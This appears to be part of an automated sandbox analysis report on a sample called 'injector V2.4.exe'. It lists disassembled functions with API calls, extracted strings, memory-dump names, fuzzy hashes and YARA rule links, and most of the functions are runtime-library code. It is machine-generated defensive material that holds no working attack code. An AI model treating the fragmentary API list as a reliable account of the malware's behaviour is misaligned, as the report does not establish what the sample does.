Instruction Fuzzy Hash: C2711A3E2153044F4A288A38ADC877EB6D2DFA5324FB987D2D552CB3E5DB21EC458742

Function 00B2A2F2 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 163fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00B2A96A

Strings

A\, xrefs: 00B2B85B
"!-, xrefs: 00B2B880
x", xrefs: 00B2C4EA
A\, xrefs: 00B2B86D
x", xrefs: 00B2C4DC
A\, xrefs: 00B2ADC4
"!-, xrefs: 00B2B872
U<_k, xrefs: 00B2A30A

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: CreateFile
String ID: A\$A\$A\$U<_k$x"$x"$"!-$"!-
API String ID: 823142352-2094675021
Opcode ID: 049ff094814aca753249a77081175a83616643452ee4579a5cc07c0a60e2bc5d
Instruction ID: e3adb2db089bcfdc2e4f8546a815f12d71891e9d36c909b64975bfbaf9529022
Opcode Fuzzy Hash: 049ff094814aca753249a77081175a83616643452ee4579a5cc07c0a60e2bc5d
Instruction Fuzzy Hash: 1251E4322443648BCE2C9A2878E963D62C3ABE6331F3592DBE51F9B6F5CB644C815507

Function 00B525C3 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00B526E2
___TypeMatch.LIBVCRUNTIME ref: 00B527F0
CatchIt.LIBVCRUNTIME ref: 00B52841
_UnwindNestedFrames.LIBCMT ref: 00B52942
CallUnexpected.LIBVCRUNTIME ref: 00B5295D

Strings

csm, xrefs: 00B5266D
csm, xrefs: 00B52600
csm, xrefs: 00B52719

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4119006552-393685449
Opcode ID: 2bdcb8ccc59f528826b422666d78671f02c3ac73dba88527aef0c7ace8a97b52
Instruction ID: 45a4c17138b49329cb54cc857b4d2e34239410fffe1e70bf8a685df44acc8902
Opcode Fuzzy Hash: 2bdcb8ccc59f528826b422666d78671f02c3ac73dba88527aef0c7ace8a97b52
Instruction Fuzzy Hash: 2FB138318022099FCF19DFA4C881AAEBBF5FF19316F1441E9EC116B212D731EA59DB91

Function 00B53F46 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(008A05A0,008A05A0,00000000,7FFFFFFF,?,00B53F31,008A05A0,008A05A0,00000000,008A05A0,?,?,?,?,008A05A0,00000000), ref: 00B53FEC
__alloca_probe_16.LIBCMT ref: 00B540A7
__alloca_probe_16.LIBCMT ref: 00B54136
__freea.LIBCMT ref: 00B54181
__freea.LIBCMT ref: 00B54187
__freea.LIBCMT ref: 00B541BD
__freea.LIBCMT ref: 00B541C3
__freea.LIBCMT ref: 00B541D3

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 0447742c2b698f47873432dcdd49fc57277fe89d1e32482df5cfc4ebc8661ca4
Instruction ID: ef56e744ecc62a0cdb393fb7d56e5de3f10b317e78d9dbf0201db979e886ab86
Opcode Fuzzy Hash: 0447742c2b698f47873432dcdd49fc57277fe89d1e32482df5cfc4ebc8661ca4
Instruction Fuzzy Hash: B47101729007056ADF219F648C81BAE7BFAEF5531AF2800D9ED14B7281D731DDC887A1

Function 00B448F0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 243COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00B44997

Strings

(^Hx, xrefs: 00B44A8B
(^Hx, xrefs: 00B44AAC
(^Hx, xrefs: 00B44AB7

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: ___std_exception_copy
String ID: (^Hx$(^Hx$(^Hx
API String ID: 2659868963-1348055467
Opcode ID: e7ab19fc00a675cc0460a21f5787312162d33fd94931c8af76f0f6e8addad2a7
Instruction ID: 6f58e69f9acafb190962dc9b945ee23934eec273c76a039be9a21e7f5379995f
Opcode Fuzzy Hash: e7ab19fc00a675cc0460a21f5787312162d33fd94931c8af76f0f6e8addad2a7
Instruction Fuzzy Hash: 24811B362043005F8B24DA29A9C833E72D1E798321F7C8AD5E5A1CB7E1EF75CA54B742

Function 00B49E40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00B49E77
___except_validate_context_record.LIBVCRUNTIME ref: 00B49E7F
_ValidateLocalCookies.LIBCMT ref: 00B49F08
__IsNonwritableInCurrentImage.LIBCMT ref: 00B49F33
_ValidateLocalCookies.LIBCMT ref: 00B49F88

Strings

csm, xrefs: 00B49F1D

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 24e524fd0fb79f98a9658a351eb220649c5f459267e1c9b79e84e700a247911c
Instruction ID: c778cff382c8a130e6a90332a1503ec3ce4e834225436c6d2fe64578e38955a9
Opcode Fuzzy Hash: 24e524fd0fb79f98a9658a351eb220649c5f459267e1c9b79e84e700a247911c
Instruction Fuzzy Hash: 0041A334A002199BCF10DF68D881A9FBBE5EF45324F1481D5E8189B392E731EF19DB91

Function 00B4C89A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,E9ED27CF,?,00B4C9A9,?,00B2782F,00000000,00000000), ref: 00B4C95B

Strings

ext-ms-, xrefs: 00B4C905
api-ms-, xrefs: 00B4C8F1

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 480a960c1a1e2f9d003609983796ca108e9d7d45f0b39af801e2731a75a18c06
Instruction ID: e78ad31aadc7077bf82e3991a8323a17f6b405207be3a1e0dd368f393e601a96
Opcode Fuzzy Hash: 480a960c1a1e2f9d003609983796ca108e9d7d45f0b39af801e2731a75a18c06
Instruction Fuzzy Hash: B021D531A06311BBD7629F68DC80B5A3FE9EB45BA1F1405E0E815A7291DB30EF00E6D1

Function 00B4C13E Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B4C135,00B49C1D,00B49814), ref: 00B4C14C
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B4C15A
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B4C173
SetLastError.KERNEL32(00000000,00B4C135,00B49C1D,00B49814), ref: 00B4C1C5

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 07b574f77fe556f80a5baffd7ea9088b712c2522c6bfe9513aeb4b0484c9e705
Instruction ID: b2520602d1ed2a7e875443044bea62556673610a05484073213e86828acfb73e
Opcode Fuzzy Hash: 07b574f77fe556f80a5baffd7ea9088b712c2522c6bfe9513aeb4b0484c9e705
Instruction Fuzzy Hash: D701D83210A7116DB66527B56CC5F263FD4CB11F7B72003FAF524660E2EE514D057594

Function 00B4FAB4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\injector V2.4.exe, xrefs: 00B4FAD0

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\injector V2.4.exe
API String ID: 0-660097568
Opcode ID: 9b523ce69885e20e55402e50f1e1b981a05652e91e36661555709c9526c99c54
Instruction ID: be1db36567d3007cda6b4feda3c6a409c000ac073bafaa49c81cf6002918b56e
Opcode Fuzzy Hash: 9b523ce69885e20e55402e50f1e1b981a05652e91e36661555709c9526c99c54
Instruction Fuzzy Hash: D5216A71600217AF9F20AFB5CCA1D7BB7E9EF0136471185B5F86997251DB30EE00ABA1

Function 00B4A925 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E9ED27CF,?,?,00000000,00B563AE,000000FF,?,00B4A9E6,?,?,00B4AA82,788496A7), ref: 00B4A95A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B4A96C
FreeLibrary.KERNEL32(00000000,?,00000000,00B563AE,000000FF,?,00B4A9E6,?,?,00B4AA82,788496A7), ref: 00B4A98E

Strings

CorExitProcess, xrefs: 00B4A964
mscoree.dll, xrefs: 00B4A953

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2f298a5ae5b9a4433df680da809e6894f8bb14610e5485a68d845eabd7adc129
Instruction ID: 24203e575b2ee8810862d8aabf323c60fa59f5a16aed9dcb0b7edf1ccdef18fd
Opcode Fuzzy Hash: 2f298a5ae5b9a4433df680da809e6894f8bb14610e5485a68d845eabd7adc129
Instruction Fuzzy Hash: 5301A271950719AFDB128F54DC09BAEBBF8FB44B16F0402A9E811A36E0EB749904CA90

Function 00B529E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00B528EE,?,?,00000000,00000000,00000000,?), ref: 00B52A0D
CatchIt.LIBVCRUNTIME ref: 00B52AF3

Strings

RCC, xrefs: 00B52A27
MOC, xrefs: 00B52A1F

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: b6e4811d408807bed3f8830c7fec5037f6a5ed9b320c6411333118b744deacbc
Instruction ID: e7116953e758f5c15904211e6723982d2739256a9870b911120c3226cebb4c9b
Opcode Fuzzy Hash: b6e4811d408807bed3f8830c7fec5037f6a5ed9b320c6411333118b744deacbc
Instruction Fuzzy Hash: 9F414671A01209AFDF25CF98C981AAEBBF5FF09305F1880D9FA0467222E3359A55DB50

Function 00B50C22 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(788496A7,00000000,00000800,?,00B50CBE,?,?,?,?,?,?,00B50B06,00000000,FlsAlloc,00B58060,00B58068), ref: 00B50C2F
GetLastError.KERNEL32(?,00B50CBE,?,?,?,?,?,?,00B50B06,00000000,FlsAlloc,00B58060,00B58068,?,?,00B4C0EC), ref: 00B50C39
LoadLibraryExW.KERNEL32(788496A7,00000000,00000000,?,788496A7,?,?,?,?,00B4BD8C,?,?,00B33046,?,00000000,788496A7), ref: 00B50C61

Strings

api-ms-, xrefs: 00B50C46

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 0c7c7178fa36047d768fd465e6ab4c591f52bdd8015f917f024d956a15e0a438
Instruction ID: e7ef1ec7c678c422d43911c49b3d9fb70e400363d08cc35714257f308a0f70a9
Opcode Fuzzy Hash: 0c7c7178fa36047d768fd465e6ab4c591f52bdd8015f917f024d956a15e0a438
Instruction Fuzzy Hash: 3FE01A30680308BAEA212BA5ED46B1A3F9AEB01B42F1040E0FD0CAC0A1EBA299559584

Function 00B5157F Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(E9ED27CF,00000000,00000000,?), ref: 00B515E2

Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B51834
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B5187A
GetLastError.KERNEL32 ref: 00B5191D

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: de704682eceb4e38c3b5f09b3cb75fcadd36038b260da3f42776c48b5b55cb81
Instruction ID: d76d7660a7a8e0b50ab572c5f483a359158408b4c544443337649b5db093b239
Opcode Fuzzy Hash: de704682eceb4e38c3b5f09b3cb75fcadd36038b260da3f42776c48b5b55cb81
Instruction Fuzzy Hash: D7D16BB5D002489FDB15CFA8D880BEDBBF5EF09311F2849AAE865EB251D730A945CB50

Function 00B523EC Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00B524B3
___AdjustPointer.LIBCMT ref: 00B524D6
___AdjustPointer.LIBCMT ref: 00B52572

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: c3883cfc76eef90477dc86f80c3d5233577d1adf882329254f29412588d35ced
Instruction ID: 011f415e91e5e5b69ac81c9ec62745c7eed27363568d33de7b20805fe90502ee
Opcode Fuzzy Hash: c3883cfc76eef90477dc86f80c3d5233577d1adf882329254f29412588d35ced
Instruction Fuzzy Hash: 3E511372A022029FDB2A8F14E891B7AB7E4FF16312F1444EDED05972A1E731ED49D790

Function 00B4F50E Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F

GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00B4F8B4,?,?,?,00000000), ref: 00B4F572
__dosmaperr.LIBCMT ref: 00B4F579
GetLastError.KERNEL32(00000000,00B4F8B4,?,?,00000000,?,?,?,00000000,00000000,?,00B4F8B4,?,?,?,00000000), ref: 00B4F5B3
__dosmaperr.LIBCMT ref: 00B4F5BA

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 0ce96eb5ecaf084e1ed619947cbce0cc5f82e3837bb8527f9f94e519a23b3e7f
Instruction ID: 76521a857f5b0832f7d109ff8ab0f8d3037f6269f7ac3451eb492d8c058b6502
Opcode Fuzzy Hash: 0ce96eb5ecaf084e1ed619947cbce0cc5f82e3837bb8527f9f94e519a23b3e7f
Instruction Fuzzy Hash: 2321A771600617AFDB10AF658C8197BB7E9FF2436471085B9F86997250DB30EF40ABA1

Function 00B5020A Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B50212

Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B5024A
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B5026A

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 507738891ba6b25e576b98afd431d28e03af80b38d1db0edf54f0c0c9ee410a6
Instruction ID: 12d92b183119b71e6ad47d4cc7f8598abb6e544062f5b1b315ee1bfb4c76b93a
Opcode Fuzzy Hash: 507738891ba6b25e576b98afd431d28e03af80b38d1db0edf54f0c0c9ee410a6
Instruction Fuzzy Hash: 0011E1A2511A167E671137729CCEE6F6EEDDE86396B1004E4FC02A2102EEB1CE059575

Function 00B54400 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000), ref: 00B54417
GetLastError.KERNEL32(?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?,?,?,00B512B7,00000000), ref: 00B54423

Part of subcall function 00B54480: CloseHandle.KERNEL32(FFFFFFFE,00B54433,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?,?), ref: 00B54490

___initconout.LIBCMT ref: 00B54433

Part of subcall function 00B54455: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B543F1,00B53BCF,?,?,00B51971,?,00000000,00000000,?), ref: 00B54468

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?), ref: 00B54448

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
